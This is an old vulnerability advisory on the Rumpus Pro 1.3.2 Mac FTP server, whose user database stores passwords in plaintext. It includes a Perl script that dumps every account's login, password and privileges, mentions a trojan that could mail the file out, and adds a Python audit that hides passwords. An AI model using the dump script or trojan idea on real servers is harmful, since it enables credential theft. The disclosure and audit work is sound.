
Rumpus Pro 1.3.2 Vulnerability
Author: Epic <epic@msec.net>
Released: 07.15.99

ABSTRACT
Rumpus Pro 1.3.2, a commercial Macintosh FTP server, is a simple, easy-to-use solution that lets users upload and download files. Rumpus Pro 1.3.2 has the option of allowing anonymous users to connect, and "privileged" accounts can be set up that let "privileged" users upload, download, rename, move, etc. files. These types of accounts require a password for the user to connect. However, the user accounts, privileges and passwords are stored in a file in plaintext.

DETAILS
The default path to the Rumpus User Database file is Macintosh HD:System Folder:Preferences:Rumpus Folder:Rumpus User Database where Macintosh HD is the name of the Startup volume.

When the User Database is opened using HexEdit or a similar hexadecimal editing utility, the file will look something like this:

ANONYMOUS..ROOT.NYYYYYYY.0
epic.password.ROOT.NYYYYYYY.0 (Notice that the Password is in Plaintext)

Breaking this down: "ANONYMOUS" is the login name, and ".." shows that the password is null. (Notice that the password for epic's account is "password".) The "NYYYYYYY" is the user's privileges, and the 0 shows that the user has an unlimited amount of disk space for his or her drop box.

If Rumpus is set up properly, keeping the User Database out of the wrong hands is fairly easy. However, a misconfigured copy of Rumpus could make the User Database readily available for download, and from there, with little effort, a potential intruder could gain trusted access to your system. Another possible way to exploit this vulnerability is for a potential intruder to get you to run untrusted code (a trojan type of application), which could mail out the User Database or copy it to a public directory on the FTP server. If Rumpus is also set up for remote administration via HTTP, an intruder with "privileged" accounts could create new accounts and change account passwords, along with other functions.

I wrote a simple Perl script that will dissect the User Database and display a list of User Information:

-- Cut Here --
#!perl -w
# Rumpus User Database Dissector
# Written by Epic, A Member of mSec
# Requires MacPerl 5 to Run, Will Need modification to run under Different Platforms
# http://www.msec.net
$file = MacPerl::Ask("Location of Rumpus User Database:");
open(DATA, $file) or die "Unable to Open: " . $file . "\n";
print "Looking for User Information in the Rumpus User Database File\n\n";
while(<DATA>)
{
    chomp;
    # Each record is tab-separated: login, password, home directory, privilege flags, disk quota
    ($login, $password, $directory, $privilages, $disk_space) = split(/\x09/);
    print " Login Name: $login\n";
    print " Password: $password\n";
    print "Home Directory: $directory\n";
    # The privilege field is eight single-character flags, each "Y" or "N"
    ($drop, $down, $up, $delfile, $folder, $delfolder, $permit, $dirlist) = split(//, $privilages);
    print " Privileges: ";
    # String comparison (eq) is required here; == would compare "Y" and "N" as numbers
    if($drop eq "Y")
    {
        print "User Restricted to Drop Folder\n";
    }
    if($down eq "Y")
    {
        print " Can Download Files\n";
    }
    if($up eq "Y")
    {
        print " Can Upload Files\n";
    }
    if($delfile eq "Y")
    {
        print " Can Delete and Overwrite Files\n";
    }
    if($folder eq "Y")
    {
        print " Can Create New Folder\n";
    }
    if($delfolder eq "Y")
    {
        print " Can Delete Folders\n";
    }
    if($permit eq "Y")
    {
        print " Login Permitted\n";
    }
    if($dirlist eq "Y")
    {
        print " Allowed Directory Listing\n";
    }
    # A quota of 0 means no limit on the drop box
    if ($disk_space == 0)
    {
        $disk_space = "Unlimited";
    }
    print " Disk Space: $disk_space Megabytes\n\n";
}
close(DATA);
-- Cut Here --
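
Added example, not part of the original advisory or of Rumpus: a Python audit of the same tab-separated format that reports risky accounts without printing any password, and checks for the misconfiguration described above, where the User Database sits inside a folder an account can download from. The flag order is taken from the script above; the function names, and treating a home directory of ROOT as the FTP root folder passed in as ftp_root, are assumptions.

```python
# Added example (not from the advisory): audit a Rumpus User Database
# without ever echoing a stored password.
# Flag order follows the advisory's script.
FLAGS = ("drop_only", "download", "upload", "delete_files",
         "create_folder", "delete_folder", "login", "dir_list")

# Constructed sample modelled on the advisory's listing (tab-separated, CR line ends).
SAMPLE = (b"ANONYMOUS\t\tROOT\tNYYYYYYY\t0\r"
          b"epic\tpassword\tROOT\tNYYYYYYY\t0\r")
DB_PATH = "Macintosh HD:System Folder:Preferences:Rumpus Folder:Rumpus User Database"

def parse(raw):
    """Yield one dict per well-formed record; the password itself is dropped."""
    for line in raw.decode("mac_roman").splitlines():
        fields = line.split("\t")
        if len(fields) != 5 or len(fields[3]) != len(FLAGS):
            continue  # malformed record
        login, password, home, flags, _quota = fields
        yield {"login": login, "has_password": bool(password), "home": home,
               "privs": {n for n, f in zip(FLAGS, flags) if f == "Y"}}

def under(path, folder):
    """True if a colon-separated Mac path lies inside folder (case-insensitive)."""
    p = path.lower().split(":")
    f = folder.lower().rstrip(":").split(":")
    return len(p) > len(f) and p[:len(f)] == f

def audit(raw, db_path, ftp_root):
    """Return (login, finding) pairs. Assumption: home "ROOT" means ftp_root."""
    findings = []
    for acct in parse(raw):
        privs, who = acct["privs"], acct["login"]
        if "login" not in privs:
            continue  # account cannot log in
        if not acct["has_password"] and who.upper() != "ANONYMOUS":
            findings.append((who, "named account with blank password"))
        home = ftp_root if acct["home"] == "ROOT" else acct["home"]
        if "download" in privs and under(db_path, home):
            findings.append((who, "User Database lies inside a downloadable folder"))
        if not acct["has_password"] and privs & {"upload", "delete_files", "delete_folder"}:
            findings.append((who, "passwordless account with write or delete rights"))
    return findings

if __name__ == "__main__":
    # Misconfigured case: the whole startup volume is the FTP root.
    for who, finding in audit(SAMPLE, DB_PATH, "Macintosh HD"):
        print(f"{who}: {finding}")
```
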

In conclusion, the Rumpus FTP server is "secure" to an extent, however, under certain circumstances, the lack of an encrypted password scheme could put your server at risk.

WORKAROUND
N/A

Epic <epic@msec.net>
http://www.msec.net



Copyright © 1998-2001 mSEC